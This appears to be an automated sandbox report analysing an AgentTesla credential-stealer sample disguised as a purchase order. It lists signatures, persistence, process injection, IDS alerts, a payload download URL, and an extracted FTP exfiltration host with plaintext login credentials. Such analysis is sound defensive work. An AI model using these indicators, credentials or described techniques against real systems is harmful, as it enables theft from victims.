Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Overview

General Information

Sample name:PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Analysis ID:1527719
MD5:68b39ced0840d43e3a03e2f92c268c72
SHA1:9dfb2ce520e0df7000d2c2a05a012d4446904480
SHA256:d96d65aab0e55fb6e3d470c7dc58c8c6e687c81df626b60c7461c9349734d240
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe" MD5: 68B39CED0840D43E3A03E2F92C268C72)
    • InstallUtil.exe (PID: 5796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Avycqjqvmh.exe (PID: 2472 cmdline: "C:\Users\user\AppData\Roaming\Avycqjqvmh.exe" MD5: 68B39CED0840D43E3A03E2F92C268C72)
    • InstallUtil.exe (PID: 5996 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Avycqjqvmh.exe (PID: 928 cmdline: "C:\Users\user\AppData\Roaming\Avycqjqvmh.exe" MD5: 68B39CED0840D43E3A03E2F92C268C72)
    • InstallUtil.exe (PID: 7140 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000002.2951059742.0000000003087000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000005.00000002.1966327299.0000000003F9B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 45 entries
              SourceRuleDescriptionAuthorStrings
              5.2.Avycqjqvmh.exe.3f9ba40.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5a60000.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x31261:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x312d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x3135d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x313ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x31459:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x314cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x31561:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x315f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Click to see the 19 entries

                      System Summary

                      barindex
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Avycqjqvmh
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-07T09:13:37.746922+020020299271A Network Trojan was detected192.168.2.4497315.2.84.23621TCP
                      2024-10-07T09:13:49.942457+020020299271A Network Trojan was detected192.168.2.4497355.2.84.23621TCP
                      2024-10-07T09:13:57.535391+020020299271A Network Trojan was detected192.168.2.4497435.2.84.23621TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-07T09:13:38.457461+020028555421A Network Trojan was detected192.168.2.4497325.2.84.23661569TCP
                      2024-10-07T09:13:38.462799+020028555421A Network Trojan was detected192.168.2.4497325.2.84.23661569TCP
                      2024-10-07T09:13:50.650246+020028555421A Network Trojan was detected192.168.2.4497405.2.84.23650003TCP
                      2024-10-07T09:13:50.656811+020028555421A Network Trojan was detected192.168.2.4497405.2.84.23650003TCP
                      2024-10-07T09:13:58.222414+020028555421A Network Trojan was detected192.168.2.4497445.2.84.23649640TCP
                      2024-10-07T09:13:58.227737+020028555421A Network Trojan was detected192.168.2.4497445.2.84.23649640TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 1.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
                      Source: wymascensores.comVirustotal: Detection: 11%Perma Link
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeReversingLabs: Detection: 63%
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeReversingLabs: Detection: 63%
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeVirustotal: Detection: 27%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeJoe Sandbox ML: detected
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeJoe Sandbox ML: detected
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49742 version: TLS 1.2
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000003436000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003EA6000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000003436000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003EA6000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 059CAE37h0_2_059CAA98
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 059CB66Eh0_2_059CB5E8
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 059CB66Eh0_2_059CB7E5
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 059CB66Eh0_2_059CB608
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 059CAE37h0_2_059CAA88
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 05B4CA9Ch0_2_05B4CAC5
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 05B4929Ch0_2_05B48FA0
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 05B4929Ch0_2_05B48F93
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 05B437F8h0_2_05B43738
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05B47F08
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05B47F50
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05B47F58
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 05B437F8h0_2_05B43740
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then jmp 05B4929Ch0_2_05B49265
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_05BBD5D0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 061EAE37h2_2_061EAA98
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 061EB66Eh2_2_061EB608
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 061EB66Eh2_2_061EB7E5
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 061EB66Eh2_2_061EB5E8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 061EAE37h2_2_061EAA88
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 0636CA9Ch2_2_0636D010
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 063637F8h2_2_06363738
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h2_2_06367F50
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h2_2_06367F58
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 0636CA9Ch2_2_0636D010
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 063637F8h2_2_06363740
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 0636929Ch2_2_06368FA0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 0636929Ch2_2_06368F92
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 0636929Ch2_2_06369265
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_063DD5D0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 05F9AE37h5_2_05F9AA98
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 05F9B66Eh5_2_05F9B5E8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 05F9B66Eh5_2_05F9B7E5
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 05F9B66Eh5_2_05F9B608
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 05F9AE37h5_2_05F9AA88
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 0611CA9Ch5_2_0611D010
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 061137F8h5_2_06113738
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h5_2_06117F50
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h5_2_06117F58
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 061137F8h5_2_06113740
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 0611CA9Ch5_2_0611D010
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 0611929Ch5_2_06118F92
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 0611929Ch5_2_06118FA0
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then jmp 0611929Ch5_2_06119265
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h5_2_0618D5D0

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49732 -> 5.2.84.236:61569
                      Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49731 -> 5.2.84.236:21
                      Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49735 -> 5.2.84.236:21
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49740 -> 5.2.84.236:50003
                      Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49743 -> 5.2.84.236:21
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49744 -> 5.2.84.236:49640
                      Source: global trafficTCP traffic: 5.2.84.236 ports 61569,1,2,50003,49640,21
                      Source: global trafficTCP traffic: 192.168.2.4:49732 -> 5.2.84.236:61569
                      Source: global trafficHTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 67.212.175.162 67.212.175.162
                      Source: Joe Sandbox ViewIP Address: 5.2.84.236 5.2.84.236
                      Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownFTP traffic detected: 5.2.84.236:21 -> 192.168.2.4:49731 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 10:13. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: wymascensores.com
                      Source: global trafficDNS traffic detected: DNS query: ftp.alternatifplastik.com
                      Source: InstallUtil.exe, 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1857971492.000000000332C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000248C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com/index/Nbyrwv.datxC
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
